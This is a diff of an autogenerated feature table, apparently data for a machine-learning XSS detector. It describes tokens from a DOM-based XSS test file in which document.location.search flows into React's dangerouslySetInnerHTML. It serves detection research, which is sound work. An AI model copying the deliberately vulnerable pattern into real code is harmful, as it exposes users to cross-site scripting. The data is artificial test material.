autogenerated/Xss/DomBasedXss/tst.js:199:5:199:76 | React.c ... nted}}) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:199:5:199:76 | React.c ... nted}}) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:199:5:199:76 | React.c ... nted}}) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:199:5:199:76 | exceptional return of React.c ... nted}}) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:199:5:199:76 | exceptional return of React.c ... nted}}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:199:5:199:76 | exceptional return of React.c ... nted}}) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:199:5:199:76 | exceptional return of React.c ... nted}}) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:199:5:199:76 | exceptional return of React.c ... nted}}) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:199:11:199:23 | createElement | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:199:11:199:23 | createElement | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:199:11:199:23 | createElement | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:199:11:199:23 | createElement | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:199:11:199:23 | createElement | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:199:25:199:29 | "div" | CalleeFlexibleAccessPath | React.createElement | | autogenerated/Xss/DomBasedXss/tst.js:199:25:199:29 | "div" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:199:25:199:29 | "div" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16830,6 +116534,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:199:32:199:75 | {danger ... inted}} | enclosingFunctionName | react | | autogenerated/Xss/DomBasedXss/tst.js:199:32:199:75 | {danger ... inted}} | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:199:32:199:75 | {danger ... inted}} | receiverName | React | +| autogenerated/Xss/DomBasedXss/tst.js:199:33:199:55 | dangero ... nerHTML | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:199:33:199:55 | dangero ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:199:33:199:55 | dangero ... nerHTML | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:199:33:199:55 | dangero ... nerHTML | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:199:33:199:55 | dangero ... nerHTML | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:199:33:199:74 | dangero ... ainted} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:199:33:199:74 | dangero ... ainted} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:199:33:199:74 | dangero ... ainted} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:199:33:199:74 | dangero ... ainted} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:199:33:199:74 | dangero ... ainted} | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:199:33:199:74 | dangero ... ainted} | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:199:33:199:74 | dangero ... ainted} | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:199:33:199:74 | dangero ... ainted} | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:199:33:199:74 | dangero ... ainted} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:199:33:199:74 | dangero ... ainted} | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:199:58:199:74 | {__html: tainted} | CalleeFlexibleAccessPath | React.createElement | | autogenerated/Xss/DomBasedXss/tst.js:199:58:199:74 | {__html: tainted} | InputAccessPathFromCallee | 1.dangerouslySetInnerHTML | | autogenerated/Xss/DomBasedXss/tst.js:199:58:199:74 | {__html: tainted} | InputArgumentIndex | 1 | @@ -16839,6 +116558,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:199:58:199:74 | {__html: tainted} | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | | autogenerated/Xss/DomBasedXss/tst.js:199:58:199:74 | {__html: tainted} | enclosingFunctionName | react | | autogenerated/Xss/DomBasedXss/tst.js:199:58:199:74 | {__html: tainted} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:199:59:199:64 | __html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:199:59:199:64 | __html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:199:59:199:64 | __html | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:199:59:199:64 | __html | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:199:59:199:64 | __html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:199:59:199:73 | __html: tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:199:59:199:73 | __html: tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:199:59:199:73 | __html: tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:199:59:199:73 | __html: tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:199:59:199:73 | __html: tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:199:59:199:73 | __html: tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:199:59:199:73 | __html: tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:199:59:199:73 | __html: tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:199:59:199:73 | __html: tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:199:59:199:73 | __html: tainted | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:199:67:199:73 | tainted | CalleeFlexibleAccessPath | React.createElement | | autogenerated/Xss/DomBasedXss/tst.js:199:67:199:73 | tainted | InputAccessPathFromCallee | 1.dangerouslySetInnerHTML.__html | | autogenerated/Xss/DomBasedXss/tst.js:199:67:199:73 | tainted | InputArgumentIndex | 1 | @@ -16848,6 +116582,41 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:199:67:199:73 | tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | | autogenerated/Xss/DomBasedXss/tst.js:199:67:199:73 | tainted | enclosingFunctionName | react | | autogenerated/Xss/DomBasedXss/tst.js:199:67:199:73 | tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:200:5:200:9 | React | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:200:5:200:9 | React | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:200:5:200:9 | React | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:200:5:200:9 | React | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:200:5:200:9 | React | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:200:5:200:23 | React.createFactory | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:200:5:200:23 | React.createFactory | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:200:5:200:23 | React.createFactory | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:200:5:200:23 | React.createFactory | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:200:5:200:23 | React.createFactory | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:200:5:200:30 | React.c ... ("div") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:200:5:200:30 | React.c ... ("div") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:200:5:200:30 | React.c ... ("div") | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:200:5:200:30 | React.c ... ("div") | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:200:5:200:30 | React.c ... ("div") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:200:5:200:30 | exceptional return of React.c ... ("div") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:200:5:200:30 | exceptional return of React.c ... ("div") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:200:5:200:30 | exceptional return of React.c ... ("div") | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:200:5:200:30 | exceptional return of React.c ... ("div") | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:200:5:200:30 | exceptional return of React.c ... ("div") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:200:5:200:76 | React.c ... nted}}) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:200:5:200:76 | React.c ... nted}}) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:200:5:200:76 | React.c ... nted}}) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted 